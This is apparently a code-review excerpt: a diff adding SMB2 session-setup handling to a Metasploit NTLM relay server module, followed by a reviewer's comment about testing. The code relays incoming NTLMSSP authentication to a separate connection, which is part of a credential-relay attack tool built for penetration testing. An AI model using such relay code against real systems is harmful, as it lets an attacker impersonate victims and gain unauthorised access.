lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb

```diff
@@ -0,0 +1,366 @@
+      end
+
+      session.metadata[:relay_mode] = true
+      session.metadata[:relayed_connection] = relayed_connection
+      session.state = :in_progress
+
+      response = RubySMB::SMB2::Packet::TreeConnectResponse.new
+      response.smb2_header.nt_status = FORCE_RETRY_SESSION_SETUP.value
+
+      response
+    end
+
+    def do_session_setup_smb2(request, session)
+      # TODO: Add shared helper for grabbing session lookups
+      session_id = request.smb2_header.session_id
+      if session_id == 0
+        session_id = rand(1..0xfffffffe)
+        session = @session_table[session_id] = ::RubySMB::Server::Session.new(session_id)
+      else
+        session = @session_table[session_id]
+        if session.nil?
+          response = SMB2::Packet::ErrorPacket.new
+          response.smb2_header.nt_status = WindowsError::NTStatus::STATUS_USER_SESSION_DELETED
+          return response
+        end
+      end
+
+      # Perform a normal setup flow with ruby_smb
+      unless session&.metadata[:relay_mode]
+        response = super
+        session.metadata[:identity] = session.user_id
+
+        # TODO: Remove guest flag
+        return response
+      end
+
+      ntlmssp_result = self.relay_ntlmssp(session, request.buffer)
+      return if ntlmssp_result.nil?
+
+      response = ::RubySMB::SMB2::Packet::SessionSetupResponse.new
+      response.smb2_header.credits = 1
+      response.smb2_header.message_id = request.smb2_header.message_id
+      response.smb2_header.session_id = session_id
+
+      if ntlmssp_result.is_a?(::Net::NTLM::Message)
+        response.smb2_header.nt_status = ::WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED.value
+        response.buffer = ntlmssp_result.serialize
+
+        if @dialect == '0x0311'
+          update_preauth_hash(response)
+        end
+
+        return response
+      else
+        response.smb2_header.nt_status = ntlmssp_result.nt_status.value
+        response.buffer = ntlmssp_result.buffer
+      end
+
+      update_preauth_hash(request) if @dialect == '0x0311'
+      if ntlmssp_result.nt_status == WindowsError::NTStatus::STATUS_SUCCESS
+        response.smb2_header.credits = 32
+        session.state = :valid
+        session.user_id = ntlmssp_result.identity
+        # TODO: This is invalid now with the relay logic in place
+        session.key = @gss_authenticator.session_key
+        session.signing_required = request.security_mode.signing_required == 1
+      elsif ntlmssp_result.nt_status == WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED && @dialect == '0x0311'
+        update_preauth_hash(response)
+      end
+
+      response
+    end
+
+    def relay_ntlmssp(session, incoming_security_buffer = nil)
+      # TODO: Handle GSS correctly
+      # gss_result = process_gss(incoming_security_buffer)
+      # return gss_result if gss_result
+      # TODO: Add support for a default NTLM provider in ruby_smb
```

Comment:
Can treat this as a blocker if it comes up during testing, but it wasn't something I hit on my test machines